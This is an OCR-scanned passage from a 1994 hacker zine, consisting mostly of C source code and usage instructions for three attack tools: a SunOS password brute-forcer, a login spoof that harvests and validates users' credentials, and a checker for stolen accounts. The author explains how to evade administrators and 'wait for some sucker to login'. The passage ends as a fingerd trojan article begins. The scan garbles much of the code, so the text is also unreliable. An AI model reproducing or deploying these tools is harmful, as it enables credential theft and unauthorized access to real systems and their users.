hadow password file, but not a function like pwdauth() that will actually 
alidate the i.d. and password. If such a function does exist on other 
hadowed systems then this program could be very easily modified to work 


Ss 
V 
Ss 
without problems. 


The only real beef I have about this program is that because the 
pwdauth() function uses the standard unix crypt() function to encrypt the 
supplied password, it is very slow!!! Even in burst mode, a password file 
with 1000’s of users could take a while to get through. My advice is 
to run it in the background and direct all its screen output to /dev/null 
like so :- 


shcrack -mf -uroot -ddictl > /dev/null & 


hen you can log out then come back and check on it later! 


he program works in a number of modes, all of which I will describe below, 
is command line driven, and can be used to crack both multiple accounts in 
the password file and single accounts specified. It is also NIS/NFS (Sun 
Yellow Pages) compatible. 


How to use it 


shcrack -m[mode] -pl[password file] -uf[user id] -d[dictionary file] 
Usage :- 
m{mode] there are 3 modes of operation :- 


-mb Burst mode, this scans the password file, trying the minimum number 
of password guessing strategies on every account. 


-mi Mini-burst mode, this also scans the password file, and tries most 
password guessing strategies on every account. 


-mf Brute-force mode, tries all password strategies, including the use 
of words from a dictionary, on a single account specified. 


more about these modes in a sec, the other options are :- 
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-p[password file] This is the password file you wish to use, if this is 
left unspecified, the default is /etc/passwd. 
NB: The program automatically detects and uses the 


password file wherever it may be in NIS/NFS systems. 


-u[user id] The login i.d. of the account you wish to crack, this is used 
in Brute-force single user mode. 


-d[dict file] This uses the words in a dictionary file to generat 
possible passwords for use in single user brute force 
mode. If no filename is specified, the program only uses the 
password guessing strategies without using the dictionary. 


Modes 


AKAAA 


-mb Burst mode basically gets each account from the appropriate password 
file and uses two methods to guess its password. Firstly, it uses the 
account name as a password, this name is then reversed and tried as a 
possible password. This may seem like a weak strategy, but remember, 
the users passwords are already shadowed, and therefore are deemed to 
be secure. This can lead to sloppy passwords being used, and I have 
came across many cases where the user has used his/her i.d. asa 
password. 


-mi Mini-burst mode uses a number of other password generating methods 
as well as the 2 listed in burst mode. One of the methods involves 
taking the login i.d. of the account being cracked, and appending the 
numbers 0 to 9 to the end of it to generate possible passwords. If 
this mode has no luck, it then uses the accounts gecos ‘comment’ 
information from the password file, splitting it into words and 
trying these as passwords. Each word from the comment field is also 
reversed and tried as a possible password. 


-mf Brute-force single user mode uses all the above techniques for password 
guessing as well as using a dictionary file to provide possible 
passwords to crack a single account specified. If no dictionary filename 
is given, this mode operates on the single account using the 
same methods as mini-burst mode, without the dictionary. 


Using shadow crack 


To get program help from the command line just type :- 


S$ shcrack <RETURN> 


which will show you all the modes of operation. 


If you wanted to crack just the account ‘root’, located in 
/etc/passwd(or elsewhere on NFS/NIS systems), using all methods 
including a dictionary file called ’/dict1’, you would do :- 


S$ shcrack -mf -uroot -ddictl 


to do the above without using the dictionary file, do :- 


S$ shcrack -mf -uroot 
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or to do the above but in password file /’/miner’ do :- 


S$ sherack -mf -pminer -uroot 


to start cracking all accounts in /etc/passwd, using minimum password 
strategies do :- 
S$ shcrack -mb 


to do the above but on a password file called ’miner’ in your home 
directory do :- 


S$ shcrack -mb -pminer 
to start cracking all accounts in ’/miner’, using all strategies except 
dictionary words do :- 


S$ shcrack -mi -pminer 


ok, heres the code, ANSI C Compilers only :- 


cut her 

/* Program : Shadow Crack 
Author : (c)1994 The Shining/UPi (UK Division) 
Date : Released 12/4/94 


Unix type : SUNOS Shadowed systems only */ 


include <stdio.h> 
include <pwd.h> 

include <string.h> 
include <ctype.h> 
#include <signal.h> 


define WORDSIZE 20 /* Maximum word size */ 
define OUTFILE "data" /* File to store cracked account info */ 


Gl 


void word_strat( void ), do_dict( void ); 

void add_nums( char * ), do_comment( char * ); 

void try_word( char * ), reverse_word( char * ); 

void find_mode( void ), burst_mode( void ); 

void mini_burst( void ), brute_force( void ); 

void user_info( void ), write _details( char * ); 

void pwfile_name( void ), disable_interrupts( void ), cleanup(); 


char *logname, *comment, *homedir, *shell, *dict, *mode, 
*pwfile, *pwdauth(); 

struct passwd *getpwnam(), *pwentry; 

extern char *optarg; 

int option, uid, gid; 


int main( int argc, char **argv ) 
{ 

disable_interrupts(); 
system("clear"); 


if (argc < 2) { 


printf ("Shadow Crack - (c)1994 The Shining\n"); 
printf ("SUNOS Shadow password brute force cracker\n\n"); 
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]); 
printf ("-d[dictfile]\n\n\n"); 

( 


printf("{b] is burst mode, scans pwfile trying minimum\n"); 
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prince (" password strategies on all i.d’s\n\n"); 

printf("[i] is mini-burst mode, scans pwfile trying both\n") ; 
printf£(" userid, gecos info, and numbers to all i.d’s\n\n"); 
printf("({f] is bruteforce mode, tries all above stategies\n"); 
printt(" as well as dictionary words\n\n"); 

printf ("[pwfile] Uses the password file [pwfile], default\n"); 
printf (" is /etc/passwd\n\n"); 

printf("{loginid] Account you wish to crack, used with\n"); 
printf (" -mf bruteforce mode only\n\n"); 

printf ("[dictfile] uses dictionary file [dictfile] to\n"); 
printf (" generate passwords when used with\n"); 
printf (" -mf bruteforce mode only\n\n"); 

exit (0); 


/* Get options from the command line and store them in different 
variables */ 


while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF) 
switch (option) 


{ 


case /m’: 
mode = optarg; 
break; 

case 'p’: 
pwfile = optarg; 
break; 

case ’u’: 
logname = optarg; 
break; 

case ’d’: 
dict = optarg; 
break; 

default: 
printf ("wrong options\n"); 
break; 


} 


find_mode(); 
} 


/* Routine to redirect interrupts */ 


void disable_interrupts( void ) 

{ 

signal (SIGHUP, SIG_IGN); 
signal (SIGTSTP, cleanup) 
signal (SIGINT, cleanup) ; 
signal (SIGQUIT, cleanup) 

signal (SIGTERM, cleanup); 

} 


/* If CTRL-Z or CTRL-C is pressed, clean up & quit */ 


void cleanup( void ) 


{ 
FILE *£p; 


if ((fp = fopen("gecos", "r")) != NULL) 
remove ("gecos") ; 
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if ((fp = fopen("data", "r")) == NULL) 
printf("\nNo accounts cracked\n") ; 


printf ("Quitting\n"); 
exit (0); 
} 


/* Function to decide which mode is being used and call appropriate 
routine */ 


void find_mode( void ) 


{ 


if (strcmp(mode, "b") == NULL) 
burst_mode(); 

else 

if (strcemp(mode, "i") == NULL) 
mini_burst(); 

else 

if (strcmp(mode, "f") == NULL) 
brute_force(); 

else 


printf("Sorry - No such mode\n"); 
exit (0); 


/* Get a users information from the password file */ 


void user_info( void ) 

{ 
uid = pwentry->pw_uid; 
gid = pwentry->pw_gid,; 

comment = pwentry->pw_gecos; 

homedir = pwentry->pw_dir; 
shell = pwentry->pw_shell; 

} 


/* Set the filename of the password file to be used, default is 
/etc/passwd */ 


void pwfile_name( void ) 

{ 

if (pwfile != NULL) 
setpwfile(pwfile); 


/* Burst mode, tries user i.d. & then reverses it as possible passwords 
on every account found in the password file */ 


void burst_mode( void ) 
{ 

pwfile_name(); 
setpwent (); 


while ((pwentry = getpwent()) != (struct passwd *) NULL) 
{ 


logname = pwentry->pw_name; 
user_info(); 

try_word( logname ); 
reverse_word( logname ); 
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endpwent (); 
} 


/* Mini-burst mode, try above combinations as well as other strategies 
which include adding numbers to the end of the user i.d. to generate 
passwords or using the comment field information in the password 
file */ 


void mini_burst( void ) 
{ 

pwfile_name(); 
setpwent (); 


while ((pwentry = getpwent()) != (struct passwd *) NULL) 
{ 


logname = pwentry->pw_name; 
user_info(); 
word_strat(); 


} 


endpwent (); 
} 


/* Brute force mode, uses all the above strategies as well using a 
dictionary file to generate possible passwords */ 


void brute_force( void ) 
{ 

pwfile_name(); 
setpwent (); 


if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) { 
printf ("Sorry - User unknown\n"); 
exit (0); 

} 

else 


{ 
user_info(); 
word_strat(); 
do_dict(); 
} 


endpwent (); 
} 


/* Calls the various password guessing strategies */ 


void word_strat () 
{ 
try_word( logname ); 
reverse_word( logname ); 
add_nums( logname ); 
do_comment ( comment ); 


/* Takes the user name as its argument and then generates possible 
passwords by adding the numbers 0-9 to the end. If the username 
is greater than 7 characters, don’t bother */ 


void add_nums( char *wd ) 

{ 

Tafitte. 45 

char temp[2], buff [WORDSTIZI 


GJ 
pear 
~ 
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if (strlen(wd) < 8) { 


for (i = 0; i < 10; i++) 
{ 
strcpy (buff, wd); 
sprintf(temp, "Sd", i); 
strcat (wd, temp); 
try_word( wd ); 
strcpy (wd, buff); 


/* Gets info from the ’gecos’ comment field in the password file, 
then process this information generating possible passwords from it */ 


void do_comment( char *wd ) 


{ 
FILE *f£p; 


char temp[2], buff [WORDSTIZI 
Int. Cc, flag; 


GI 
pan 
~ 


flag = 0; 


/* Open file & store users gecos information in it. wt mode 
allows us to write to it & then read from it. */ 


if ((fp = fopen("gecos", "wt")) == NULL) { 
printf("Error writing gecos info\n"); 
exit (0); 


fprintf(fp, "%Ss\n", wd); 
rewind (fp); 


strcpy (buff, ""); 


/* Process users gecos information, separate words by checking for the 
','’ field separater or a space. */ 


while ((c = fgetc(fp)) != EOF) 


TE OCse PS ae ew Ce So yy af 

sprintf(temp, "Sc", c); 
strncat (buff, temp, 1); 

} 


else 
flag. = 1; 
if ((isspace(c)) || (c == '’,’) != NULL) { 
if (flag == 1) { 


c=fgetc(fp); 
if ((isspace(c)) || (iscntrl(c) == NULL)) 
ungetc(c, fp); 
} 


try_word (buff); 
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reverse_word (buff); 
strcpy (buff, ""); 
flag = 0; 
strcpy(temp, ""); 
} 


} 
fclose(fp); 
remove ("gecos"); 


} 


/* Takes a string of characters as its argument (in this case the 
i.d., and then reverses it */ 


void reverse_word( char *wd ) 
{ 

char temp[2], buff [WORDSTIZI 
Ante 1; 


Gl 


li 


i = strlen(wd) + 1; 


strcpy(temp, ""); 
strcpy (buff, ""); 
do 
{ 
ae 
if ((isalnum(wd[i]) || (ispunct (wd[i]))) != NULL) { 


sprintf(temp, "%c", wd[il]); 
strncat (buff, temp, 1); 
} 


} while(i != 0); 


if (strlen(buff) > 1) 
try_word (buff); 


/* Read one word at a time from the specified dictionary for use 
as possible passwords, if dictionary filename is NULL, ignore 
this operation */ 


void do_dict( void ) 


{ 


FILE *fp; 
char buff[WORDSIZE], temp[2]; 
int.-cy 
strcpy (buff, ""); 
strcpy (temp, ""); 
if (dict == NULL) 
exit (0); 
if ((fp = fopen(dict, "r")) == NULL) { 
printf("Error opening dictionary file\n"); 
exit (0); 


} 


rewind (fp); 


while ((c = fgetc(fp)) != EOF) 
{ 


login 


11.txt Wed Apr 26 09:43:40 2017 10 


tf ((e ta HY Pl fecha or \nh))y 4 
strcpy(temp, ""); 
sprintf(temp, "Sc", c); 
strncat (buff, temp, 1); 
} 


if (c == ’\n’) { 
if (butt [0] t=" *) 
try_word (buff); 


strcpy (buff, ""); 
} 
} 


fclose(fp); 
} 


/* Process the word to be used as a password by stripping \n from 
it if necessary, then use the pwdauth() function, with the login 
name and word to attempt to get a valid id & password */ 


void try_word( char pw[] ) 
{ 

int pwstat, i, pwlength; 
char temp[2], buff [WORDSTIZI 


GJ 
pe 
x 


strcpy (buff, ""); 
pwlength = strlen(pw); 


for (i = 0; i != pwlength; i++) 

{ 

if (pw[i] != ’\n’) { 
strcpy(temp, ""); 


sprintf (temp, "Sc", pw[lil]l); 
strncat (buff, temp, 1); 


if (strlen(buff) > 3) { 
printf("Trying : s\n", buff); 


if (pwstat = pwdauth(logname, buff) == NULL) { 
printf("Valid Password! - writing details to ’data’\n"); 


write details (buff); 


if (strcmp (mode, "f") == NULL) 
exit (0); 


/* If valid account & password, store this, along with the accounts 
uid, gid, comment, homedir & shell in a file called '’data’ */ 


void write_details( char *pw ) 
{ 
FILE *fp; 


if ((fp = fopen(OUTFILE, "a")) == NULL) { 
printf("Error opening output file\n"); 
exit (0); 
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fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid); 
fprintf(fp, "%Ss:%3s:%s\n", comment, homedir, shell); 
fclose (fp); 

} 


cut her 
again to compile it do :- 
S$ gcc shcrack.c -o shcrack 
or 
S$ acc shcrack.c -o shcrack 


this can vary depending on your compiler. 


The Ultimate Login Spoof 


AKRAKRAKRAKAKRAKRAKRKAAAAKRAARAKRAAAN 


Well this subject has been covered many times before but its a while since 
I have seen a good one, and anyway I thought other unix spoofs have had two 
main problems :- 


1) They were pretty easy to detect when running 
2) They recorded any only shit entered..... 


Well now I feel these problems have been solved with the spoof below. 
Firstly, I want to say that no matter how many times spoofing is deemed as 
a ‘lame’ activity, I think it is very underestimated. 


When writing this I have considered every possible feature such a program 
should have. The main ones are :- 


1) To validate the entered login i.d. by searching for it in the 
password file. 


2) Once validated, to get all information about the account entered 
including - real name etc from the comment field, homedir info 
(e.g. /homedir/miner) and the shell the account is using and 
store all this in a file. 


3) To keep the spoofs tty idle time to 0, thus not to arouse the 
administrators suspicions. 


4) To validates passwords before storing them, on all unshadowed unix systems 


& SUNOS shadowed/unshadowed systems. 


5) To emulates the ’sync’ dummy account, thus making it act like the 
real login program. 


6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically 
quit if it has not grabbed an account within a specified time. 


7) To automatically detect & display the hostname before the login prompt 
e.g. ’ccu login:’, this feature can be disabled if desired. 


8) To run continuously until a valid i.d. & valid password are entered. 


As well as the above features, I also added a few more to make the spoof 
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'foolproof’. At university, a lot of the users have been ’stung’ by 
login spoofs in the past, and so have become very conscious about security. 


For example, they now try and get around spoofs by entering any old crap when 
prompted for their login name, or to hit return a few times, to prevent any 
‘crappy’ spoofs which may be running. This is where my spoof shines!, 

firstly if someone was to enter - 


login: dhfhfhfhryr 
Password: 


into the spoof, it checks to see if the login i.d. entered is 

valid by searching for it in the password file. If it exists, the 

spoof then tries to validate the password. If both the i.d. & password 
are valid, these will be stored in a file called .data, along with 
additional information about the account taken directly from the password 
file. 


Now if, as in the case above, either the login name or password is 
incorrect, the information is discarded, and the login spoof runs again, 
waiting for a valid user i.d. & password to be entered. 


Also, a lot of systems these days have an unpassworded account called 
'sync’, which when logged onto, usually displays the date & time the 
syne account was last logged into, and from which server or tty, 

the message of the day, syncs the disk, and then logs you straight out. 


A few people have decided that the best way to dodge login spoofs is to 
first login to this account then when they are automatically logged out, 
to login to their own account. 


They do this firstly, so that if a spoof is running it only records the 
details of the sync account and secondly the spoof would not act as the 
normal unix login program would, and therefore they would spot it and report 
it, thus landing you in the shit with the system administrator. 


However, I got around this problem so that when someone 

tries to login as sync (or another account of a similar type, which you can 
define), it acts exactly like the normal login program would, right down to 
displaying the system date & time as well as the message of the day!! 


The idle time facility 


One of the main problems with unix spoofs, is they can be spotted 

so easily by the administrator, as he/she could get a list of current 
users on the system and see that an account was logged on, and had been 
idle for maybe 30 minutes. They would then investigate & the spoof 
would be discovered. 


I have therefore incorporated a scheme in the spoof whereby 

approx. every minute, the tty the spoof is executed from, is ’touched’ 
with the current time, this effectively simulates terminal activity & 
keeps the terminals idle time to zero, which helps the spoofs chances 
of not being discovered greatly. 


The spoof also incorporates a routine which will automatically 

keep track of approximately how long the spoof has been running, and if 

it has been running for a specified time without grabbing an i.d. or password, 
will automatically exit and run the real login program. 

This timer is by default set to 12.5 minutes, but you can alter this time 

if you wish. 


Note: Due to the varying processing power of some systems, I could not 
set the timer to exactly 60 seconds, I have therefore set it to 50, 
incase it loses or gains extra time. Take this into consideration when 
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setting the spoofs timer to your own value. I recommend you 
stick with the default, and under no circumstances let it run 
for hours. 


Password Validation techniques 


The spoof basically uses 2 methods of password validation(or none at 

all on a shadowed system V). Firstly, when the spoof is used on any unix 
with an unshadowed password file, it uses the crypt function to validate a 
password entered. If however the system is running SUNOS 4.1.+ and 
incorporates the shadow password system, the program uses a function called 
pwdauth(). This takes the login i.d. & decrypted password as its arguments 
and checks to see if both are valid by encrypting the password and 
comparing it to the shadowed password file which is usually located in 
/etc/security and accessible only by root. By validating both the i.d. & 
password we ensure that the data which is saved to file is correct and not 
any old bullshit typed at the terminal!!! 


Executing the Spoof 


ok, now about the program. This is written in ANSI-C, so I hope you have a 
compatible compiler, GCC or suns ACC should do it. Now the only time you 
will need to change to the code is in the following circumstances :- 


1) If you are to compile & run it on an unshadowed unix, 
in which case remove all references to the pwdauth() function, 
from both the declarations & the shadow checking routine, add 


this code in place of the shadow password checking routine :- 
if ( shadow == ) 4 
invalid = 0; 
else 
invalid = 1; 


2) Add the above code also to the spoof if you are running this on a system 
V which is shadowed. In this case the spoof loses its ability to 
validate the password, to my knowledge there is no sysV equivalent 
of the pwdauth() function. 


Everything else should be pretty much compatible. You should have no 
problems compiling & running this on an unshadowed SUNOS machine, if 
you do, make the necessary changes as above, but it compiled ok 

on every unshadowed SUNOS I tested it on. The Spoof should 
automatically detect whether a SUNOS system is shadowed or unshadowed 
and run the appropriate code to deal with each situation. 


Note: when you have compiled this spoof, you MUST ’exec’ it from the 
current shell for it to work, you must also only have one shell 
running. e.g. from C or Bourne shell using the GNU C Compiler do :- 


S$ gcc spoof.c -o spoof 
S exec spoof 


This replaces the current shell with the spoof, so when the spoof quits & 
runs the real login program, the hackers account is effectively logged off. 


ok enough of the bullshit, here’s the spoof :- 


cut her 


11.txt Wed Apr 26 09:43:40 2017 14 


/* Program Unix login spoof 

Author The Shining/UPi (UK Division) 

Date : Released 12/4/94 
A 
s 
T 


Unix Type 1l unshadowed unix systems & 
hadowed SUNOS systems 


Note his file MUST be exec’d from the shell. */ 


include <stdio.h> 
include <string.h> 
include <signal.h> 
#include <pwd.h> 
include <time.h> 
include <utime.h> 


define OUTFILE ".data" /* Data file to save account info into */ 
define LOGPATH "/usr/bin/login" /* Path of real login program */ 

define DUMMYID "sync" /* Dummy account on your system */ 

define DLENGTH 4 /* Length of dummy account name */ 


FILE *f£p; 


/* Set up variables to store system time & date */ 


time_t now; 


static int time_out, time_on, no_message, loop_cnt; 


/* Set up a structure to store users information */ 


struct loginfo { 
char logname[10]; 
char key[9]; 
char *comment; 
char *homedir; 
char *shell; 


/* Use the unix function getpass() to read user password and 
crypt () or pwdauth () (remove it below if not SUNOS) 
to validate it etc */ 


char *getpass(), *gethostname(), *alarm(), *sleep(), 
*crypt(), *ttyname(), *pwdauth(), motd, log_date[60], 
pass[14], salt[3], *tty, cons[] = " on console ", 
hname[72], *ld; 


/* flag = exit status, ppid = pid shell, wait = pause length, 
pwstat = holds 0 if valid password, shadow holds 1 if shadow 
password system is being used, 0 otherwise. */ 


int flag, ppid, wait, pwstat, shadow, invalid; 


/* Declare main functions */ 


void write_details(struct loginfo *); 

void catch( void ), disable_interrupts( void ); 

void log_out( void ), get_info( void ), 
invalid_login( void ), prep_str( char * ); 
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/* set up pointer to point to pwfile structure, and also 
a pointer to the utime() structure */ 


struct passwd *pwentry, *getpwnam(); 
struct utimbuf *times; 


int main( void ) 
{ 


system("clear"); 


/* Initialise main program variables to 0, change ’loop_cnt’ to 1 
if you do not want the machines host name to appear with 
the login prompt! (e.g. prompt is ‘login: * instead of 
‘MIT login:’ etc) */ 


wait = 3; /* Holds value for pause */ 

flag = 0; /* Spoof ends if value is 1 */ 

loop_cnt = 0; /* Change this to 1 if no host required */ 

time_out = 0; /* Stops timer if spoof has been used */ 
time_on = 0; /* Holds minutes spoof has been running */ 
disable_interrupts(); /* Call function to disable Interrupts */ 


/* Get system time & date and store in log_date, this is 
displayed when someone logs in as ’sync’ */ 


now = time (NULL); 
strftime(log_date, 60, "Last Login: ta Sh %d SH:%M:%S", Localtime (&now) ); 
strcat (log_date, cons); 

ld = log_date; 


/* Get Hostname and tty name */ 
gethostname(hname, 64); 
streat (hname, " login: "); 
tty = ttyname(); 
/* main routine */ 


while( flag == ) 
{ 


invalid = 0; /* Holds 1 if id +/or pw are invalid */ 
shadow = 0; /* 1 if shadow scheme is in operation */ 
no_message = 0; /* Flag for Login Incorrect msg */ 
alarm(50); /* set timer going */ 

get_info(); /* get user i.d. & password */ 


/* Check to see if the user i.d. entered is ’synce’, if it is 
display system time & date, display message of the day and 
then run the spoof again, insert the account of your 
choice here, if its not sync, but remember to put 
the length of the accounts name next to it! */ 


if (strncemp(u.logname, DUMMYID, DLENGTH) == NULL) { 
printf("%s\n", ld); 


if ((fp = fopen("/etc/motd", "r" 
while ((motd = getc(fp)) != 
putchar (motd) ; 


fclose(fp); 
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printf ("\n"); 
prep_str(u.logname) ; 
no_message = 1; 
sleep (wait); 


/* Check if a valid user i.d. has been input, then check to see if 
the password system is shadowed or unshadowed. 
If both the user i.d. & password are valid, get additional info 
from the password file, and store all info ina file called .data, 


then exit spoof and run real login program */ 
setpwent (); /* Rewind pwfile to beign processing */ 
if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) { 
invalid = 1; 
flag = 0; 
} 
else 


strncpy(salt, pwentry->pw_passwd, 2); 


/* Check for shadowed password system, in SUNOS, the field in /etc/passwd 
should begin with ’##’, in system V it could contain an ’x’, if none 


of these exist, it checks that the entry = 13 chars, if less then 
shadow system will probably be implemented (unless acct has been 
disabled) */ 


if ( invalid == ) { 
if ((stremp(salt, "##")) || (strncemp(salt, "x", 1)) == NULL) 
shadow = 1; 
else 
if (strlen(pwentry->pw_passwd) < 13) 
shadow = 1; 


/* If unshadowed, use the salt from the pwfile field & the key to 
form the encrypted password which is checked against the entry 
in the password file, if it matches, then all is well, if not, 


spoof runs again!! */ 
if ( shadow != 1) { 
if (strcmp (pwentry-—>pw_passwd, crypt(u.key, salt)) == NULL) 
invalid = 0; 
else 
invalid = 1; 


/* If SUNOS Shadowing is in operation, use the pwdauth() function 
to validate the password, if not SUNOS, substitute this code 
with the routine I gave earlier! */ 


if ( shadow == 1) f 
if (pwstat = pwdauth(u.logname, u.key) == NULL) 
invalid = 0; 
else 
invalid = 1; 


/* If we have a valid account & password, get user info from the 
pwfile & store it */ 
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if ( invalid == ) { 


u.comment = pwentry->pw_gecos; 
u.homedir = pwentry->pw_dir; 
u.shell = pwentry->pw_shell; 


/* Open file to store user info */ 


if ((fp = fopen(OUTFILE, "a")) == NULL) 
log_out (); 


write_details (&u); 
fclose(fp); 
no_message = 1; 
flag = 1; 


else 
flag = 0; 


invalid_login(); 
endpwent (); /* Close pwfile */ 


if (no_message == 0) 
loop_cnt++; 


} /* end while */ 


log_out (); /* call real login program */ 


/* Function to read user i.d. & password */ 


void get_info( void ) 
{ 
char user[11]; 
unsigned int string_len; 


fflush(stdin); 
prep_str(u.logname) ; 
prep_str(u.key); 
strepy(user, "\n"); 


/* Loop while some loser keeps hitting return when asked for user 
i.d. and if someone hits CTRL-D to break out of spoof. Enter 
a at login to exit spoof. Uncomment the appropriate line(s) 
below to customise the spoof to look like your system */ 


while ((strcemp(user, "\n") == NULL) && (!feof(stdin))) 


{ 
/* printf ("Scorch Ltd SUNOS 4.1.3\n\n); */ 


if (loop_cnt > 0) 
strcepy(hname, "login: "); 


printf("Ss", hname) ; 
fgets(user, 9, stdin); 
/* Back door for hacker, # at present, can be changed, 


but leave \n in. */ 


if (stremp(user, "#\n") == NULL) 
exit (0); 
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/* Strip \n from login i.d. */ 


if (strlen(user) < 8) 


string_len = strlen(user) ‘diss 
else 
string_len = strlen(user); 


strncpy(u.logname, user, string_len)j; 


/* check to see if CTRL-D has occurred because it does not 
generate an interrupt like CTRL-C, but instead generates 
an end-of-file on stdin */ 


if (feof(stdin)) { 


clearerr (stdin); 
printf ("\n"); 


/* Turn off screen display & read users password */ 


strncpy(u.key, getpass("Password:"), 8); 


/* Function to increment the timer which holds the amount of time 
the spoof has been running */ 


void catch( void ) 


{ 


time_ontt; 


/* If spoof has been running for 15 minutes, and has not 
been used, stop timer and call spoof exit routine */ 


if ( time_Lout == yeat 
if (time_on == 15) { 
prints ("\n"); 
alarm(0); 
log_out (); 


/* 'Touch’ your tty, effectively keeping terminal idle time to 0 */ 


utime (tty, times); 
alarm(50); 
} 


/* Initialise a string with \0’s */ 


void prep_str( char str[] ) 
{ 


int strl, cnt; 
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strl = strlen(str); 
for (cnt = 0; cnt != strl; cntt+t) 
str fent.) <=" ¥ 


/* function to catch interrupts, CTRL-C & CTRL-Z etc as 
well as the timer signals */ 


void disable_interrupts( void ) 
{ 
signal (SIGALRM, catch); 
signal (SIGQUIT, SIG_IGN); 
signal (SIGTERM, SIG_IGN); 
signal (SIGINT, SIG_IGN); 
signal (SIGTSTP, SIG_IGN); 


/* Write the users i.d., password, personal information, homedir 
and shell to a file */ 


void write_details(struct loginfo *sptr) 


{ 


fprintf(fp, "%s:%s:", sptr->logname, sptr->key); 
fprintf(fp, "Sd:sd:", pwentry->pw_uid, pwentry->pw_gid); 
fprintf(fp, "ss:%3s:", sptr->comment, sptr->homedir) ; 
fprintf(fp, "%Ss\n", sptr->shell); 

fprintf (fp, "\n"); 


/* Display login incorrect only if the user hasn’t logged on as 
"sync! */ 


void invalid_login( void ) 


{ 


if ( flag == 1 && pwstat == ) 
sleep (wait); 


if ( no_message == ) 
printf£("Login incorrect\n") ; 


/* Displays appropriate message, exec’s the real login program, 
this replaces the spoof & effectively logs spoof’s account off. 
Note: this spoof must be exec’d from the shell to work */ 


void log_out( void ) 


{ 


time_out = 1; 
if ( no_message == 1) { 
sleep(1); 


printf£("Login incorrect\n") ; 


} 


execl(LOGPATH, "login", (char *)0); 


cut her 


then delete the source, run it and wait for some sucker to login!. 
If you do initially run this spoof from your account, I suggest you 
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remove it when you have grabbed someone’s account and run it from theirs 
from then on, this reduces your chances of being caught! 


User i.d. & Password Validator 


AKRAKRKAAKAKRAKRAKRAKRAKRARAAAKAKAAKAKAAAAAARSN 


Now if you are familiar with the unix Crack program, as I’m sure most of 
you are ;-), or if you have used my spoof to grab some accounts, 

this little program could be of some use. Say you have snagged 

quit a few accounts, and a few weeks later you wanna see if they are still 
alive, instead of logging onto them, then logging out again 20 or 30 times 
which can take time, and could get the system admin looking your way, this 
program will continuously ask you to enter a user i.d. & password, then 
validate them both by actually using the appropriate entry in the password 
file. All valid accounts are then stored along with other info from the 
password file, ina data file. The program loops around until you stop it. 


This works on all unshadowed unix systems, and, you guessed it!, shadowed 
SUNOS systems. 


If you run it on an unshadowed unix other than SUNOS, remove all references 
to pwdauth(), along with the shadow password file checking routine, 
if your on sysV, your shit outa luck! anyway, here goes :- 


cut her 
/* Program : To validate accounts & passwords on both 
shadowed & unshadowed unix systems. 
Author : The Shining/UPi (UK Division) 
Date : Released 12/4/94 


UNIX type : All unshadowed systems, and SUNOS shadowed systems */ 


include <stdio.h> 
include <string.h> 
include <pwd.h> 


FILE *fp; 


int pw_system( void ), shadowed( void ), unshadowed( void ); 
void write_info( void ), display_notice( void ); 


struct passwd *pwentry, *getpwnam(); 


struct user { 
char logname[10]; 
char key[9]; 
char salt[3]; 


char *getpass(), *pwdauth(), *crypt(), ans[2]; 
int invalid_user, stat; 


int main( void ) 


{ 


strepy(ans, "y"); 


while (strcemp(ans, "y") == NULL) 
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invalid_user = stat = 0; 
display_notice(); 

printf ("Enter login id:"); 
scanf("%9s", u.logname) ; 
strcpy(u.key, getpass("Password:")); 


setpwent (); 


if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) 
invalid_user = 1; 

else 
strncpy(u.salt, pwentry->pw_passwd, 2); 


if (invalid_user != 1) f{ 


if ((stat = pw_system()) == 1) { 
if ((stat = unshadowed()) == NULL) { 
printf ("Unshadowed valid account! - storing details\n"); 
write_info(); 
} 
} 
else 
if ((stat = shadowed()) == NULL) { 
printf ("SUNOS Shadowed valid account! - storing details\n"); 
write_info(); 
} 
else 
invalid_user = 2; 


if (invalid_user == 1) 
printf ("User unknown/not found in password file\n"); 


if (invalid_user == ) 
printf ("Password invalid\n"); 


printf("\n\nValidate another account? (y/n): "); 
scanf("Sl1ls", ans); 


endpwent (); 
} 
} 


/* Check to see if shadow password system is used, in SUNOS the field 
in /etc/passwd starts with a ’#’, if not, check to see if entry 
is 13 chars, if not shadow must be in use. */ 


int pw_system( void ) 


{ 


if (strlen(pwentry-—>pw_passwd) != 13) 
return(0); 
else 
if (stremp(u.salt, "##") == NULL) 
return(0); 
else 


return(1); 


/* If system is unshadowed, get the 2 character salt from the password 
file, and use this to encrypt the password entered. This is then 
compared against the password file entry. */ 
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int unshadowed( void ) 

{ 

if (pwentry->pw_passwd == crypt(u.key, u.salt)) 
return (0); 

else 
return(1); 


/* If SUNOS shadowe system is used, use the pwdauth() function to validate 
the password stored in the /etc/security/passwd.adjunct file */ 


int shadowed( void ) 


{ 
int pwstat; 


if (pwstat = pwdauth(u.logname, u.key) == NULL) 
return (0); 

else 
return (1); 


/* Praise myself!!!! */ 


void display_notice( void ) 
{ 
system("clear"); 

printf ("Unix Account login id & password validator.\n"); 

printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n"); 
printf ("(c)1994 The Shining\n\n\n\n") ; 

} 


/* Open a file called ’data’ and store account i.d. & password along with 
other information retrieved from the password file */ 


void write_info( void ) 


{ 


/* Open a file & store account information from pwfile in it */ 


if ((fp = fopen("data", "a")) == NULL) { 
printf ("error opening output file\n"); 
exit (0); 


} 


fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry-—>pw_uid) ; 
fprintf(fp, "%Sd:%Ss:", pwentry->pw_gid, pwentry-—>pw_gecos) ; 
fprintf(fp, "Ss:%s\n", pwentry->pw_dir, pwentry->pw_shell); 
fclose (fp); 

} 


cut her 


The above programs will not compile under non-ansi C compilers without quite 
a bit of modification. I have tested all these programs on SUNOS both 
shadowed & unshadowed, though they should work on other systems with 

little modification (except the shadow password cracker, which is SUNOS 
shadow system specific). 


Regards to the following guys :- 
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Archbishop & The Lost Avenger/UPi, RamRaider/QTX, 


the guys at United International Perverts(yo Dirty Mac & Jasper!) 
and all I know. 


(c) 1994 The Shining (The NORTH!, U.K.) 
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The fingerd trojan horse 
Original article by Hitman Italy for Phrack Inc. 


This article is for informational purpose only, I’m not liable for 
any damage or illegal activity perpetrated using the source or the 
informations in the article. 


So you have gained access to a system and want to keep on hacking without 
being kicked off by a smart operator, there are dozen methods you can use, 
